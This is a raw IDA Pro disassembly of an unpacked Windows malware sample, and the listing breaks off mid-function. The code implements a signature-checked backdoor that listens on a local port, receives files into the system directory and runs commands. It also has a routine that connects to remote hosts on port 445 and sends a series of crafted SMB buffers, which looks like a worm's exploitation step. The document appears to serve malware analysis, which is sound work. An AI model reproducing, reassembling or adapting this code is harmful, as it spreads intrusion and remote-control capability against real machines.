;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 0CEA69313FA796739679891603B7F785
; File Name : u:\work\0cea69313fa796739679891603b7f785_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31100000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31101000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31101000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31101004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31101008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3110100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31103401+1D�r
dword_31101010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31101014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31103401+4E�r ...
dword_31101018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3110101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31101020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31101024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31101028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHash ; sub_31101248+FD�r
dword_3110102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31101030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31101034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31101038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31101040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31101044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31101048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3110104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31101050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31101054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31101058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3110105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31101060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31101064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31101068 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_3110106C dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_3110360C+F�r
dword_31101070 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_3110360C+C3�r
dword_31101074 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_31101078 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_3110107C dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3110318A+3F�r ...
dword_31101080 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_31101084 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_31101088 dd 7C830D74h, 7C80D262h; resolved to->KERNEL32.lstrcmpA ; sub_3110277D:loc_311029C3�r ...
dword_31101090 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31102663+3D�r ...
dword_31101094 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31102463+168�r ...
dword_31101098 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_31101248:loc_31101329�r ...
dword_3110109C dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_311010A0 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_31102405+A�r
dword_311010A4 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_31101582+66�r ...
dword_311010A8 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_31102663+ED�r
dword_311010AC dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_31102663+8F�r ...
dword_311010B0 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_31101651+4F�r ...
dword_311010B4 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_31101361+14B�r
dword_311010B8 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31101361+13E�r ...
dword_311010BC dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31102280+66�r ...
dword_311010C0 dd 7C80A017h ; resolved to->KERNEL32.SetEvent ; sub_31102E62+4C�r
dword_311010C4 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_31102E4E+8�r
dword_311010C8 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31102AD5+12�r ...
dword_311010CC dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_31102E62+2E�r
dword_311010D0 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31101651+272�r ...
dword_311010D4 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31101E80+A4�r ...
dword_311010D8 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_311010DC dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31101C40+2C�r
dword_311010E0 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31102E62+82�r
dword_311010E4 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_311010E8 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_311034AD+92�r
dword_311010EC dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31102DE6�r
dword_311010F0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_3110277D+1E�r ...
align 8
dword_311010F8 dd 77C46030h ; resolved to->MSVCRT.strcpydword_311010FC dd 77C46040h ; resolved to->MSVCRT.strcat; ---------------------------------------------------------------------------
loc_31101100: ; DATA XREF: sub_31103836�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31101104 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_31101108 dd 77C371BCh ; resolved to->MSVCRT.srand ; sub_31102A98+22�r
; ---------------------------------------------------------------------------
loc_3110110C: ; DATA XREF: sub_31103830�r
cmp [edi], ah
retn 0FA77h ; DATA XREF: UPX0:loc_31103820�r
; ---------------------------------------------------------------------------
db 27h, 0C2h, 77h
dword_31101114 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_311020C2+16�r ...
dword_31101118 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_3110277D+B9�r
dword_3110111C dd 77C478A0h ; resolved to->MSVCRT.strlendword_31101120 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_31101124 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_31101128 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31102217+C�r ...
align 10h
dword_31101130 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31101E80+8D�r ...
dword_31101134 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31101138 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_3110113C dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId dd 0
dword_31101144 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_31101148 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; sub_311032D9+2B�r
dword_3110114C dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlAdword_31101150 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile align 8
dword_31101158 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_3110115C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31101160 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31101164 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31101168 dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_3110116C dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_31102BD1+25�r
dword_31101170 dd 71AB2DC0h ; resolved to->WS2_32.selectdword_31101174 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoadword_31101178 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_31101E80+46�r
dword_3110117C dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31102C26+33�r
dword_31101180 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_31101651+2B�r ...
dword_31101184 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_31101651+147�r ...
dword_31101188 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_31102C74+100�r ...
dword_3110118C dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_31102C74+10D�r ...
dword_31101190 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_31102C74+120�r ...
dword_31101194 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31101651+559�r ...
dword_31101198 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31101361+D9�r ...
dword_3110119C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31101361+95�r ...
dd 2 dup(0)
dword_311011A8 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
sub_311011C0 proc near ; CODE XREF: sub_311014E6+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31101094 ; lstrcpyA
mov eax, esi
pop esi
retn
sub_311011C0 endp
; =============== S U B R O U T I N E =======================================
sub_311011D9 proc near ; CODE XREF: sub_311014E6+3A�p
push ebx
push ebp
mov ebx, dword_31101034
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+10h]
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31101208
push 8
push 1
push ebp
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31101208
push 1
pop eax
jmp short loc_31101228
; ---------------------------------------------------------------------------
loc_31101208: ; CODE XREF: sub_311011D9+1B�j
; sub_311011D9+28�j
add edi, 14h
push edi
push ebp
push ebp
push 114h
push offset dword_31105000
push dword ptr [esi]
call dword_31101038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31101228: ; CODE XREF: sub_311011D9+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_311011D9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3110122D proc near ; CODE XREF: sub_311014E6+7E�p
push esi
mov esi, ecx
push dword ptr [esi+14h]
call dword_3110102C ; CryptDestroyKey
push 0
push dword ptr [esi+10h]
call dword_31101030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3110122D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31101248 proc near ; CODE XREF: sub_311014E6+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_311010A0 ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_3110109C ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_311037AE
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_31101198 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_311037D4 ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_31101329
jl short loc_311012B6
cmp ecx, 61C46800h
ja short loc_31101329
loc_311012B6: ; CODE XREF: sub_31101248+64�j
cmp eax, 0FFFFFFF7h
jl short loc_31101329
jg short loc_311012C5
cmp ecx, 9E3B9800h
jb short loc_31101329
loc_311012C5: ; CODE XREF: sub_31101248+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+10h]
call dword_3110101C ; CryptCreateHash
test eax, eax
jz short loc_3110131A
push 0
push 8
push esi
push [ebp+var_4]
call dword_31101020 ; CryptHashData
test eax, eax
jz short loc_3110131A
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_3110131A
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+14h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31101024 ; CryptVerifySignatureA
test eax, eax
jnz short loc_31101342
loc_3110131A: ; CODE XREF: sub_31101248+98�j
; sub_31101248+AA�j ...
call dword_31101098 ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_31101028 ; CryptDestroyHash
loc_31101329: ; CODE XREF: sub_31101248+62�j
; sub_31101248+6C�j ...
call dword_31101098 ; RtlGetLastWin32Error
push 2
pop esi
loc_31101332: ; CODE XREF: sub_31101248+117�j
push edi
call sub_311037C2
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31101342: ; CODE XREF: sub_31101248+D0�j
push [ebp+var_4]
call dword_31101028 ; CryptDestroyHash
call dword_31101128 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_3110119C ; send
jmp short loc_31101332
sub_31101248 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31101361 proc near ; CODE XREF: sub_311014E6+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_31101380
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_311014D8
; ---------------------------------------------------------------------------
loc_31101380: ; CODE XREF: sub_31101361+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31101491
lea eax, [ebp+var_220]
push ebx
push eax
call dword_311010B8 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_311010B4 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_311010B0 ; lstrcpynA
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_311010AC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_3110147F
mov ebx, dword_3110119C
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; send
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31101427
inc [ebp+arg_4]
loc_31101427: ; CODE XREF: sub_31101361+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31101474
loc_31101431: ; CODE XREF: sub_31101361+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31101474
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_311010A8 ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; send
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31101431
loc_31101474: ; CODE XREF: sub_31101361+CE�j
; sub_31101361+E5�j
push [ebp+var_C]
call dword_311010A4 ; CloseHandle
jmp short loc_311014E1
; ---------------------------------------------------------------------------
loc_3110147F: ; CODE XREF: sub_31101361+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_3110119C ; send
loc_31101491: ; CODE XREF: sub_31101361+31�j
cmp [ebp+arg_4], 1
jnz short loc_311014C0
lea eax, [ebp+var_118]
push ebx
push eax
call dword_311010B8 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_311010B4 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_3110119C ; send
loc_311014C0: ; CODE XREF: sub_31101361+134�j
cmp [ebp+arg_4], 3
jnz short loc_311014E1
push dword ptr [edi]
add edi, 4
push edi
call sub_31102B40
pop ecx
pop ecx
push 0
push 4
push esi
loc_311014D8: ; CODE XREF: sub_31101361+1A�j
push [ebp+arg_0]
call dword_3110119C ; send
loc_311014E1: ; CODE XREF: sub_31101361+11C�j
; sub_31101361+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_31101361 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_311014E6 proc near ; DATA XREF: sub_31101582+AA�o
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_31102A98
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_18]
rep movsd
push [ebp+var_4]
call dword_311010C0 ; SetEvent
mov esi, 10000h
push esi
call sub_311037AE
pop ecx
mov edi, eax
lea ecx, [ebp+var_30]
call sub_311011C0
lea ecx, [ebp+var_30]
call sub_311011D9
lea eax, [ebp+var_18]
lea ecx, [ebp+var_30]
push eax
call sub_31101248
test eax, eax
jnz short loc_3110155A
loc_31101535: ; CODE XREF: sub_311014E6+72�j
push 0
push esi
push edi
push [ebp+var_18]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_3110155A
test eax, eax
jz short loc_3110155A
push eax
push edi
push [ebp+var_18]
call sub_31101361
add esp, 0Ch
jmp short loc_31101535
; ---------------------------------------------------------------------------
loc_3110155A: ; CODE XREF: sub_311014E6+4D�j
; sub_311014E6+5F�j ...
push edi
call sub_311037C2
pop ecx
lea ecx, [ebp+var_30]
call sub_3110122D
push [ebp+var_18]
call dword_31101194 ; closesocket
push 0
call dword_311010BC ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_311014E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31101582 proc near ; DATA XREF: sub_31102E62+EC�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_31101180 ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_311037DA ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_311015B3: ; CODE XREF: sub_31101582+59�j
lea eax, [esi+0BFBh]
push eax
call dword_31101184 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31101188 ; bind
test eax, eax
jz short loc_311015DD
inc esi
cmp esi, 0Ah
jl short loc_311015B3
loc_311015DD: ; CODE XREF: sub_31101582+53�j
push 32h
push [ebp+var_4]
call dword_3110118C ; listen
mov ebx, dword_311010A4
loc_311015EE: ; CODE XREF: sub_31101582+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31101190 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_311010CC ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_311014E6
push esi
push esi
call dword_311010C8 ; CreateThread
push eax
call ebx ; CloseHandle
push 3E8h
push [ebp+var_30]
call dword_311010C4 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; CloseHandle
jmp short loc_311015EE
sub_31101582 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31101651 proc near ; CODE XREF: sub_31103126+36�p
; sub_3110318A+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_311037F0
mov eax, dword_31105B0C
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31105B10
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31101180 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31101BB1
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31101174 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_311010B0 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31105B00
push eax
call dword_31101130 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_311016C4: ; CODE XREF: sub_31101651+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_311016C4
push 60h
lea eax, [ebp+var_E4]
push offset dword_31105614
push eax
call sub_311037D4 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_311037E0 ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_311037D4 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_311037E0 ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_311037D4 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_311037E0 ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_311037D4 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_311037E0 ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_311037D4 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_311037DA ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_311037DA ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31101184 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31101178 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31101BA7
mov esi, dword_311010D4
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_3110119C
push 89h
push offset dword_311053FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31101B9C
push 0
push 0A8h
push offset dword_31105488
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31101B9C
push 0
push 0DEh
push offset dword_31105534
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31101B9C
cmp eax, 46h
jl loc_31101B9C
cmp [ebp+var_730], 31h
jnz loc_31101A47
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_311037DA ; memset
add esp, 0Ch
push offset loc_31105120
call dword_311010D0 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset loc_31105120
push eax
call sub_311037D4 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_311010D0 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_311037D4 ; memcpy
mov eax, dword_31105A40
add esp, 0Ch
mov [ebp+var_798], eax
loc_311018E8: ; CODE XREF: sub_31101651+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31101B9C
push 0
push 68h
push offset dword_31105678
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31101B9C
push 0
push 0A0h
push offset dword_311056E4
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31101B9C
cmp [ebp+arg_0], 0
jz loc_31101B37
push 68h
lea eax, [ebp+var_89E4]
push offset dword_3110589C
push eax
call sub_311037D4 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_311037D4 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31105908
push eax
call sub_311037D4 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_311037D4 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_3110597C
push eax
call sub_311037D4 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31101198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31101B9C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31101B8F
; ---------------------------------------------------------------------------
loc_31101A47: ; CODE XREF: sub_31101651+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_311037DA ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31105A7C
push eax
call sub_311037D4 ; memcpy
push offset loc_31105120
call sub_311037E0 ; strlen
push eax
lea eax, [ebp+var_24E4]
